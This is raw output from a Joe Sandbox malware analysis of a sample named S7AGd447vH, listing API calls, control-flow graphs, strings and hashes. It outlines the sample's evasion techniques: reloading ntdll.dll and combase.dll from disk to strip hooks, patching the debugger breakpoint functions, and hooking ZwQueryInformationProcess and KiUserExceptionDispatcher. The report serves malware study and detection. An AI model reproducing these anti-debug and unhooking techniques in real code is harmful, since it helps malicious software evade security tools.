                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 7FE319B9
                                                                                    • Part of subcall function 7FE31BC0: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,7FE319C5,00000000), ref: 7FE31BD6
                                                                                    • Part of subcall function 7FE31BC0: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 7FE31BE2
                                                                                    • Part of subcall function 7FE31C06: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                    • Part of subcall function 7FE31C06: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                    • Part of subcall function 7FE31C06: GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                    • Part of subcall function 7FE31C06: malloc.MSVCRT ref: 7FE31C67
                                                                                    • Part of subcall function 7FE31C06: ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                    • Part of subcall function 7FE31C06: VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                    • Part of subcall function 7FE31C06: free.MSVCRT ref: 7FE31D06
                                                                                    • Part of subcall function 7FE31C06: CloseHandle.KERNELBASE(7FE319D1), ref: 7FE31D10
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 7FE319E5
                                                                                  • memcpy.MSVCRT(Function_00000000,00000000,?), ref: 7FE31A93
                                                                                  • GetCurrentProcess.KERNEL32 ref: 7FE31AC5
                                                                                  • IsBadReadPtr.KERNEL32(?,?), ref: 7FE31B09
                                                                                  • IsBadReadPtr.KERNEL32(00000000,?), ref: 7FE31B17
                                                                                  • memcmp.MSVCRT(?,00000000,?), ref: 7FE31B26
                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,00001000,00000040,?), ref: 7FE31B5B
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 7FE31B98
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_7fe31000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$FileHandleRead$CurrentModuleProcessVirtual$AddressAllocCloseCreateEnvironmentExpandFreeProcSizeStringsfreemallocmemcmp
                                                                                  • String ID: %Systemroot%\system32\combase.dll$%Systemroot%\system32\ntdll.dll$ZwProtectVirtualMemory$combase.dll$ntdll.dll
                                                                                  • API String ID: 288383237-3427567192
                                                                                  • Opcode ID: f1a208d53d8805e2378b0198be8e792b5a9b92c2038927b6b191f4b3b12e1ae7
                                                                                  • Instruction ID: e13732920362c93adadf7f955773acdb4f5f8b940de6f6bd2b25e23fa99a90bd
                                                                                  • Opcode Fuzzy Hash: f1a208d53d8805e2378b0198be8e792b5a9b92c2038927b6b191f4b3b12e1ae7
                                                                                  • Instruction Fuzzy Hash: 4851B375D00319EFDF118FA5C888EEEB7BAEF84335F90415EE802A6140E7396A44CB61
                                                                                  Function 7FE31C06 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99filememoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                  • malloc.MSVCRT ref: 7FE31C67
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                  • memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                  • memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                  • free.MSVCRT ref: 7FE31D06
                                                                                  • CloseHandle.KERNELBASE(7FE319D1), ref: 7FE31D10
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_7fe31000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$memcpy$AllocCloseCreateEnvironmentExpandHandleReadSizeStringsVirtualfreemalloc
                                                                                  • String ID: MZ
                                                                                  • API String ID: 674188835-2410715997
                                                                                  • Opcode ID: 226944550cf8b9c8bf3112644910aa94d62cb1f495bc6e49e34df98963ec1635
                                                                                  • Instruction ID: 37ed921750a05b1c156510011ba82f53be2a36d11858f4e25eb232333dd4bf60
                                                                                  • Opcode Fuzzy Hash: 226944550cf8b9c8bf3112644910aa94d62cb1f495bc6e49e34df98963ec1635
                                                                                  • Instruction Fuzzy Hash: 7C31C3BAD00208EFCB208F95CC8CEDEBBBDEF45726F604459F94696140D774AA94DB60
                                                                                  Function 0041B29A Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 115 41b29a-41b2aa 116 41b2c4-41b2c6 115->116 117 41b2ac-41b2bf call 413c44 call 413c57 115->117 119 41b62b-41b638 call 413c44 call 413c57 116->119 120 41b2cc-41b2d2 116->120 133 41b643 117->133 138 41b63e call 41569f 119->138 120->119 123 41b2d8-41b2fe 120->123 123->119 126 41b304-41b30d 123->126 129 41b327-41b329 126->129 130 41b30f-41b322 call 413c44 call 413c57 126->130 131 41b627-41b629 129->131 132 41b32f-41b332 129->132 130->138 137 41b646-41b649 131->137 132->131 136 41b338-41b33c 132->136 133->137 136->130 140 41b33e-41b355 136->140 138->133 144 41b357-41b35a 140->144 145 41b3a6-41b3ac 140->145 148 41b36a-41b370 144->148 149 41b35c-41b365 144->149 146 41b372-41b389 call 413c44 call 413c57 call 41569f 145->146 147 41b3ae-41b3b8 145->147 182 41b55e 146->182 150 41b3ba-41b3bc 147->150 151 41b3bf-41b3dd call 41753a call 417051 * 2 147->151 148->146 153 41b38e-41b3a1 148->153 152 41b42a-41b43a 149->152 150->151 186 41b3fa-41b423 call 41f87f 151->186 187 41b3df-41b3f5 call 413c57 call 413c44 151->187 155 41b440-41b44c 152->155 156 41b4ff-41b508 call 41f686 152->156 153->152 155->156 159 41b452-41b454 155->159 170 41b57b 156->170 171 41b50a-41b51c 156->171 159->156 163 41b45a-41b47e 159->163 163->156 167 41b480-41b496 163->167 167->156 173 41b498-41b49a 167->173 175 41b57f-41b597 ReadFile 170->175 171->170 172 41b51e-41b52d GetConsoleMode 171->172 172->170 177 41b52f-41b533 172->177 173->156 178 41b49c-41b4c2 173->178 180 41b5f3-41b5fe GetLastError 175->180 181 41b599-41b59f 175->181 177->175 183 41b535-41b54f ReadConsoleW 177->183 178->156 185 41b4c4-41b4da 178->185 188 41b600-41b612 call 413c57 call 413c44 180->188 189 41b617-41b61a 180->189 181->180 190 41b5a1 181->190 184 41b561-41b56b call 417051 182->184 193 41b551 GetLastError 183->193 194 41b570-41b579 183->194 184->137 185->156 198 41b4dc-41b4de 185->198 186->152 187->182 188->182 195 41b620-41b622 189->195 196 41b557-41b55d call 413c21 189->196 192 41b5a4-41b5b6 190->192 192->184 203 41b5b8-41b5bc 192->203 193->196 194->192 195->184 196->182 198->156 206 41b4e0-41b4fa 198->206 209 41b5d5-41b5e0 203->209 210 41b5be-41b5ce call 41afb4 203->210 206->156 215 41b5e2 call 41b10b 209->215 216 41b5ec-41b5f1 call 41ade3 209->216 221 41b5d1-41b5d3 210->221 222 41b5e7-41b5ea 215->222 216->222 221->184 222->221
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3907804496
                                                                                  • Opcode ID: c5fc1acd454c809a3f827d147cfc9e5bbe1309f9dea165f61a64e230980958e6
                                                                                  • Instruction ID: ccbdb6b73398ac1f50e4eba1b780227a473e8b811b79760b547c434c52d04649
                                                                                  • Opcode Fuzzy Hash: c5fc1acd454c809a3f827d147cfc9e5bbe1309f9dea165f61a64e230980958e6
                                                                                  • Instruction Fuzzy Hash: E4C10770E04249AFDB11DF59D880BEEBBB1FF49304F10415AE914A7392C77899C2CBA9
                                                                                  Function 7FE416D7 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 56memorylibraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,7FE4208A,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?,?,?,00000000,?), ref: 7FE416E0
                                                                                  • GetProcAddress.KERNEL32(00000000,DbgBreakPoint), ref: 7FE416F9
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,7FE4208A,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?), ref: 7FE41711
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,?,7FE4208A,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?), ref: 7FE41722
                                                                                  • GetProcAddress.KERNEL32(00000000,DbgUserBreakPoint), ref: 7FE4172A
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?,?,?,00000000), ref: 7FE4173D
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,7FE4208A,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?,?,?,00000000), ref: 7FE4174E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual$AddressProc$HandleModule
                                                                                  • String ID: DbgBreakPoint$DbgUserBreakPoint$ntdll.dll
                                                                                  • API String ID: 2768151571-2163194510
                                                                                  • Opcode ID: dc61deef4fa4a8389b5bc066f4f6e32763e1d74a14b8d98a62bb532b6e57c122
                                                                                  • Instruction ID: 3f854206d3d5076221b1d09f819529f2bcf6369cecf85685e806e0c7a52382f1
                                                                                  • Opcode Fuzzy Hash: dc61deef4fa4a8389b5bc066f4f6e32763e1d74a14b8d98a62bb532b6e57c122
                                                                                  • Instruction Fuzzy Hash: FE01D8772083057FD2119655AC40F7B7BBCDBC6574F10021EFF55A21819B74E415467A
                                                                                  Function 0041E647 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 237 41e647-41e677 call 41e395 240 41e692-41e69e call 41880a 237->240 241 41e679-41e684 call 413c44 237->241 247 41e6a0-41e6b5 call 413c44 call 413c57 240->247 248 41e6b7-41e700 call 41e300 240->248 246 41e686-41e68d call 413c57 241->246 257 41e96c-41e970 246->257 247->246 255 41e702-41e70b 248->255 256 41e76d-41e776 GetFileType 248->256 259 41e742-41e768 GetLastError call 413c21 255->259 260 41e70d-41e711 255->260 261 41e778-41e7a9 GetLastError call 413c21 CloseHandle 256->261 262 41e7bf-41e7c2 256->262 259->246 260->259 266 41e713-41e740 call 41e300 260->266 261->246 276 41e7af-41e7ba call 413c57 261->276 264 41e7c4-41e7c9 262->264 265 41e7cb-41e7d1 262->265 269 41e7d5-41e823 call 418755 264->269 265->269 270 41e7d3 265->270 266->256 266->259 279 41e842-41e86a call 41e0ad 269->279 280 41e825-41e831 call 41e50f 269->280 270->269 276->246 286 41e86c-41e86d 279->286 287 41e86f-41e8b0 279->287 280->279 288 41e833 280->288 289 41e835-41e83d call 4171a4 286->289 290 41e8d1-41e8df 287->290 291 41e8b2-41e8b6 287->291 288->289 289->257 293 41e8e5-41e8e9 290->293 294 41e96a 290->294 291->290 292 41e8b8-41e8cc 291->292 292->290 293->294 296 41e8eb-41e91e CloseHandle call 41e300 293->296 294->257 300 41e920-41e94c GetLastError call 413c21 call 41891d 296->300 301 41e952-41e966 296->301 300->301 301->294
                                                                                  APIs
                                                                                    • Part of subcall function 0041E300: CreateFileW.KERNELBASE(00000000,00000000,?,0041E6F0,?,?,00000000,?,0041E6F0,00000000,0000000C), ref: 0041E31D
                                                                                  • GetLastError.KERNEL32 ref: 0041E75B
                                                                                  • __dosmaperr.LIBCMT ref: 0041E762
                                                                                  • GetFileType.KERNELBASE(00000000), ref: 0041E76E
                                                                                  • GetLastError.KERNEL32 ref: 0041E778
                                                                                  • __dosmaperr.LIBCMT ref: 0041E781
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041E7A1
                                                                                  • CloseHandle.KERNEL32(?), ref: 0041E8EE
                                                                                  • GetLastError.KERNEL32 ref: 0041E920
                                                                                  • __dosmaperr.LIBCMT ref: 0041E927
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                  • String ID:
                                                                                  • API String ID: 4237864984-0
                                                                                  • Opcode ID: 9afa501fba7988bbc51a9d23f1a0abce0e230cb407ae35beeac04adf8d3fcdb9
                                                                                  • Instruction ID: 5e3602541a990c6dca23ae760bb8d465da58fae656e24a2382b44c06c340b680
                                                                                  • Opcode Fuzzy Hash: 9afa501fba7988bbc51a9d23f1a0abce0e230cb407ae35beeac04adf8d3fcdb9
                                                                                  • Instruction Fuzzy Hash: 01A12736A041458FCF19AF69DC51BEE7BA1AB06324F14015EEC11AB3D1DB388D93CB59
                                                                                  Function 7FE41755 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 162stringCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 306 7fe41755-7fe41788 call 7fe4257f 309 7fe418c2-7fe418d0 306->309 310 7fe4178e-7fe417c2 call 7fe426c5 call 7fe4285d 306->310 312 7fe41910-7fe41914 309->312 313 7fe418d2 309->313 310->309 320 7fe417c8-7fe417cb 310->320 314 7fe418d5-7fe418f6 call 7fe4194a 313->314 318 7fe418fb-7fe4190e free 314->318 318->312 318->314 320->309 321 7fe417d1-7fe417e2 call 7fe427d7 320->321 321->309 324 7fe417e8-7fe417f4 321->324 324->309 325 7fe417fa-7fe41802 324->325 326 7fe41804-7fe41816 strncmp 325->326 327 7fe4181f-7fe41836 call 7fe4281a 325->327 326->327 329 7fe41818 326->329 327->309 331 7fe4183c-7fe41841 327->331 329->327 332 7fe418b4-7fe418b7 331->332 333 7fe41843-7fe41854 call 7fe427d7 331->333 332->309 335 7fe418b9-7fe418bc 332->335 333->332 337 7fe41856-7fe41861 333->337 335->309 335->321 337->332 338 7fe41863-7fe41866 337->338 339 7fe418a8-7fe418b2 338->339 340 7fe41868-7fe41877 malloc 338->340 339->332 339->333 340->339 341 7fe41879-7fe418a5 memcpy 340->341 341->339
                                                                                  APIs
                                                                                    • Part of subcall function 7FE4257F: lstrlen.KERNEL32(?,?,?,00000000,?,7FE41777,?,/etc/plugins.plist,?), ref: 7FE4259C
                                                                                  • strncmp.NTDLL ref: 7FE4180B
                                                                                  • malloc.MSVCRT ref: 7FE4186C
                                                                                  • memcpy.NTDLL(00000008,?,?), ref: 7FE41889
                                                                                  • free.MSVCRT ref: 7FE418FC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: freelstrlenmallocmemcpystrncmp
                                                                                  • String ID: /etc/plugins.plist$MZ$x86
                                                                                  • API String ID: 3682158708-1713858012
                                                                                  • Opcode ID: 54bb9ffcdce75293fdea451ea1764c5140780be0e9db6a82e14bb8dd9a51f797
                                                                                  • Instruction ID: 957808bbf470da9d99de4376462d0edb45fc24e4bfde69fd6e974ca862a0dbb1
                                                                                  • Opcode Fuzzy Hash: 54bb9ffcdce75293fdea451ea1764c5140780be0e9db6a82e14bb8dd9a51f797
                                                                                  • Instruction Fuzzy Hash: BA510A76D012199FCF01CFE4D9849EEB7B9FF48228F24556EE916B7200E734AA45CB60
                                                                                  Function 7FE42459 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 100COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 342 7fe42459-7fe4246a 343 7fe42470-7fe42477 342->343 344 7fe42562-7fe4256b 342->344 343->344 345 7fe4247d-7fe42481 343->345 345->344 346 7fe42487-7fe4248b 345->346 346->344 347 7fe42491-7fe42497 346->347 347->344 348 7fe4249d-7fe424e8 347->348 348->344 349 7fe424ea-7fe424f9 calloc 348->349 349->344 350 7fe424fb-7fe42511 call 7fe422d6 349->350 353 7fe42513-7fe42516 350->353 354 7fe4255a-7fe42561 free 350->354 353->354 355 7fe42518-7fe4251b 353->355 354->344 355->354 356 7fe4251d-7fe42521 355->356 356->354 357 7fe42523-7fe42527 356->357 357->354 358 7fe42529-7fe4252d 357->358 358->354 359 7fe4252f-7fe42542 malloc 358->359 359->354 360 7fe42544-7fe42557 memcpy 359->360 360->354
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: callocfreemallocmemcpy
                                                                                  • String ID: !$S$k
                                                                                  • API String ID: 861552148-1352728671
                                                                                  • Opcode ID: c9b9c47c16ca03e766a67db26b61f7cbb891e1b8cbf3b34d4765739f8dd69da7
                                                                                  • Instruction ID: 604d0970c97af9f6bca1788cb46740802a4dd3dc1fb44fca78aaa917fe2bbe24
                                                                                  • Opcode Fuzzy Hash: c9b9c47c16ca03e766a67db26b61f7cbb891e1b8cbf3b34d4765739f8dd69da7
                                                                                  • Instruction Fuzzy Hash: 7A316C729087519AE721CE29E850672BFEADFC1315F14C85EF0BFC6442D778E1498722
                                                                                  Function 00580273 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 232memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 00580391
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00101000,00000040), ref: 005804A1
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0058050B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704912105.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_580000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$Alloc$Free
                                                                                  • String ID: !$S$k
                                                                                  • API String ID: 3668210933-1352728671
                                                                                  • Opcode ID: 9b9b3c59536dfe2ac67a7b67f04a7fb9125a8182ea0d4415f552f70be9e8cc3c
                                                                                  • Instruction ID: e6d5ac0a6d799273b3a951926eb1be7afac1fc250644e59c7843b58b8bf69cc1
                                                                                  • Opcode Fuzzy Hash: 9b9b3c59536dfe2ac67a7b67f04a7fb9125a8182ea0d4415f552f70be9e8cc3c
                                                                                  • Instruction Fuzzy Hash: 62916C71D00619ABDFA0EF95C884BAEBBB4BF44304F049559ED59BB281D374E948CFA0
                                                                                  Function 7FE31D81 Relevance: 9.1, APIs: 6, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(7FE31BB3,00000000,?,?,?,?,?,?,?,7FE31BB3,combase.dll,%Systemroot%\system32\combase.dll), ref: 7FE31D8C
                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,7FE31BB3,combase.dll,%Systemroot%\system32\combase.dll), ref: 7FE31DA1
                                                                                    • Part of subcall function 7FE31C06: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                    • Part of subcall function 7FE31C06: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                    • Part of subcall function 7FE31C06: GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                    • Part of subcall function 7FE31C06: malloc.MSVCRT ref: 7FE31C67
                                                                                    • Part of subcall function 7FE31C06: ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                    • Part of subcall function 7FE31C06: VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                    • Part of subcall function 7FE31C06: free.MSVCRT ref: 7FE31D06
                                                                                    • Part of subcall function 7FE31C06: CloseHandle.KERNELBASE(7FE319D1), ref: 7FE31D10
                                                                                  • IsBadReadPtr.KERNEL32(7FE31BB3,00000080), ref: 7FE31E42
                                                                                  • IsBadReadPtr.KERNEL32(7FE31BB3,00000080), ref: 7FE31E4E
                                                                                    • Part of subcall function 7FE31EEA: memcmp.MSVCRT(7FE31BB3,7FE31E6D,7FE31E6D,7FE31BB3,?,00000080,?,7FE31E6D,7FE31BB3,7FE31BB3,00000080,?,?,?,00000000), ref: 7FE31F0D
                                                                                  • memcpy.MSVCRT(7FE31BB3,7FE31BB3,?,?,?,00001000,00000040,00000004,?,?,?,?,?,?,00000000), ref: 7FE31EA2
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000,?,?,?,?,?,?,?,7FE31BB3,combase.dll), ref: 7FE31EDF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_7fe31000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileReadmemcpy$HandleVirtual$AllocCloseCreateCurrentEnvironmentExpandFreeModuleProcessSizeStringsfreemallocmemcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1807237107-0
                                                                                  • Opcode ID: 65760951e2fbb1f37c2ca01f434e78f1b247da36f8d6a80a04fa196cab3b0387
                                                                                  • Instruction ID: e66e30e26c8d651dff7f802cc7b867a7bcfc757d2cd4cd66e8dd7680ebece615
                                                                                  • Opcode Fuzzy Hash: 65760951e2fbb1f37c2ca01f434e78f1b247da36f8d6a80a04fa196cab3b0387
                                                                                  • Instruction Fuzzy Hash: 32416275D00209EFDF019FA6CD88AAEBBBAFF44364F54412EE902E7150E735A954CB60
                                                                                  Function 7FE41EF2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53memorylibraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 361 7fe41ef2-7fe41f08 GetProcAddress 362 7fe41f0a-7fe41f0f 361->362 363 7fe41f6b-7fe41f6f 361->363 362->363 364 7fe41f11-7fe41f2c call 7fe41f70 362->364 364->363 367 7fe41f2e-7fe41f31 364->367 367->363 368 7fe41f33-7fe41f4c VirtualProtect 367->368 368->363 369 7fe41f4e-7fe41f69 InterlockedExchange VirtualProtect 368->369 369->363
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,ZwQueryInformationProcess), ref: 7FE41F00
                                                                                  • VirtualProtect.KERNELBASE(00000001,00000004,00000040,?,7FE41EA9,00000000,?,?,?,?), ref: 7FE41F48
                                                                                  • InterlockedExchange.KERNEL32(?,7FE41EA4), ref: 7FE41F57
                                                                                  • VirtualProtect.KERNELBASE(?,00000004,?,?), ref: 7FE41F69
                                                                                  Strings
                                                                                  • ZwQueryInformationProcess, xrefs: 7FE41EF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual$AddressExchangeInterlockedProc
                                                                                  • String ID: ZwQueryInformationProcess
                                                                                  • API String ID: 1726986358-1584433389
                                                                                  • Opcode ID: cca9fdba920f07e8de881a81ace27208a19ae97a59725a68c8e7acdeb786ef06
                                                                                  • Instruction ID: 9d314fcda45d8e175856064bc7b8333d7a3f38f698c62f2d4cac807126b7cea3
                                                                                  • Opcode Fuzzy Hash: cca9fdba920f07e8de881a81ace27208a19ae97a59725a68c8e7acdeb786ef06
                                                                                  • Instruction Fuzzy Hash: 4F015B3630020ABBDF024EA1DD45FEA3F7AEF856E4F140129FE099A090D731E5668B94
                                                                                  Function 7FE41E0E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 370 7fe41e0e-7fe41e34 GetModuleHandleA GetProcAddress 371 7fe41e36-7fe41e60 call 7fe41eb3 370->371 372 7fe41eac-7fe41eb0 370->372 371->372 375 7fe41e62-7fe41e65 371->375 375->372 376 7fe41e67-7fe41e76 call 7fe411b0 375->376 379 7fe41e7d-7fe41e7f 376->379 380 7fe41e78-7fe41e7b 376->380 379->375 380->379 381 7fe41e81-7fe41e99 call 7fe41eb3 380->381 381->372 384 7fe41e9b-7fe41ea4 call 7fe41ef2 381->384 386 7fe41ea9 384->386 386->372
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 7FE41E1C
                                                                                  • GetProcAddress.KERNEL32(00000000,KiUserExceptionDispatcher), ref: 7FE41E2A
                                                                                    • Part of subcall function 7FE411B0: memset.NTDLL ref: 7FE411D2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcmemset
                                                                                  • String ID: KiUserExceptionDispatcher$ntdll.dll
                                                                                  • API String ID: 3137504439-391726712
                                                                                  • Opcode ID: 11d2593c27cc74ef7a9c2590feb6ed6d42a7dd48463c0d874392180369953c0b
                                                                                  • Instruction ID: bf9c5516763da571611dd8505f09cccef45188715b9c227fe0ff8b64459f62f7
                                                                                  • Opcode Fuzzy Hash: 11d2593c27cc74ef7a9c2590feb6ed6d42a7dd48463c0d874392180369953c0b
                                                                                  • Instruction Fuzzy Hash: EA11B97AD01306BBCF129B66AC80CBFBB7DFF85264B21165EF90597101E734E55187A0
                                                                                  Function 7FE4344E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11librarystringCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
